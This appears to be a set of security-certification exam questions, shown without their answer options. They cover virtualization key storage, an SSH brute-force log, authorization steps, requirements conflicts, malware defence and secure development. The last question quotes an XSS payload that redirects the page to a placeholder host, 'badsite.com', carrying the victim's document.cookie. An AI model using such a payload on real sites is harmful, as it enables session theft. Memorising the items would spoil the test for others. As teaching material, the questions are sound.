A security architect is designing a new infrastructure using both type 1 and type 2 virtual machines. In addition
to the normal complement of security controls (e.g. antivirus, host hardening, HIPS/NIDS) the security architect
needs to implement a mechanism to securely store cryptographic keys used to sign code and code modules on
the VMs. Which of the following will meet this goal without requiring any hardware pass-through
implementations?

A security administrator is shown the following log excerpt from a Unix system:
2013 Oct 10 07:14:57 web14 sshd[1632]: Failed password for root from 198.51.100.23 port 37914 ssh2
2013 Oct 10 07:14:57 web14 sshd[1635]: Failed password for root from 198.51.100.23 port 37915 ssh2
2013 Oct 10 07:14:58 web14 sshd[1638]: Failed password for root from 198.51.100.23 port 37916 ssh2
2013 Oct 10 07:15:59 web14 sshd[1640]: Failed password for root from 198.51.100.23 port 37918 ssh2
2013 Oct 10 07:16:00 web14 sshd[1641]: Failed password for root from 198.51.100.23 port
37920 ssh2
2013 Oct 10 07:16:00 web14 sshd[1642]: Successful login for root from 198.51.100.23 port 37924 ssh2
Which of the following is the MOST likely explanation of what is occurring and the BEST immediate response?
(Select TWO).

A security engineer is a new member to a configuration board at the request of management. The company
has two new major IT projects starting this year and wants to plan security into the application deployment. The
board is primarily concerned with the applications’ compliance with federal assessment and authorization
standards. The security engineer asks for a timeline to determine when a security assessment of both
applications should occur and does not attend subsequent configuration board meetings. If the security
engineer is only going to perform a security assessment, which of the following steps in system authorization
has the security engineer omitted?

Executive management is asking for a new manufacturing control and workflow automation solution. This
application will facilitate management of proprietary information and closely guarded corporate trade secrets.
The information security team has been a part of the department meetings and come away with the following
notes:
-Human resources would like complete access to employee data stored in the application. They would like
automated data interchange with the employee management application, a cloud- based SaaS application.
-Sales is asking for easy order tracking to facilitate feedback to customers. -Legal is asking for adequate
safeguards to protect trade secrets. They are also concerned with data ownership questions and legal
jurisdiction.
-Manufacturing is asking for ease of use. Employees working the assembly line cannot be bothered with
additional steps or overhead. System interaction needs to be quick and easy. -Quality assurance is concerned
about managing the end product and tracking overall performance of the product being produced. They would
like read-only access to the entire workflow process for monitoring and baselining.
The favored solution is a user friendly software application that would be hosted onsite. It has extensive ACL
functionality, but also has readily available APIs for extensibility. It supports read-only access, kiosk automation,
custom fields, and data encryption. Which of the following departments’ request is in contrast to the favored
solution?

An extensible commercial software system was upgraded to the next minor release version to patch a security
vulnerability. After the upgrade, an unauthorized intrusion into the system was
detected. The software vendor is called in to troubleshoot the issue and reports that all core components were
updated properly. Which of the following has been overlooked in securing the system? (Select TWO).

A security administrator notices a recent increase in workstations becoming compromised by malware. Often,
the malware is delivered via drive-by downloads, from malware hosting websites, and is not being detected by
the corporate antivirus. Which of the following solutions
would provide the BEST protection for the company?

An analyst connects to a company web conference hosted on www.webconference.com/meetingID#01234 and
observes that numerous guests have been
allowed to join, without providing identifying information. The topics covered during the web conference are
considered proprietary to the company. Which of the following security concerns does the analyst present to
management?

A company is in the process of implementing a new front end user interface for its customers, the goal is to
provide them with more self service functionality. The application has been written by developers over the last
six months and the project is currently in the test phase. Which of the following security activities should be
implemented as part of the SDL in order to provide the MOST security coverage over the solution? (SelectTWO).

The Information Security Officer (ISO) is reviewing new policies that have been recently made effective andnow apply to the company. Upon review, the ISO identifies a new requirement to implement two-factor
authentication on the company’s wireless system. Due to budget constraints, the company will be unable to
implement the requirement for the next two years. The ISO is required to submit a policy exception form to the
Chief Information Officer (CIO). Which of the following are MOST important to include when submitting the
exception form? (Select THREE).

A security administrator notices the following line in a server’s security log:
<input name=’credentials’ type=’TEXT’ value='” +
request.getParameter(‘><script>document.location=’http://badsite.com/?q=’document.cooki e</script>’) + “‘;
The administrator is concerned that it will take the developer a lot of time to fix the application that is running on
the server. Which of the following should the security administrator implement to prevent this particular attack?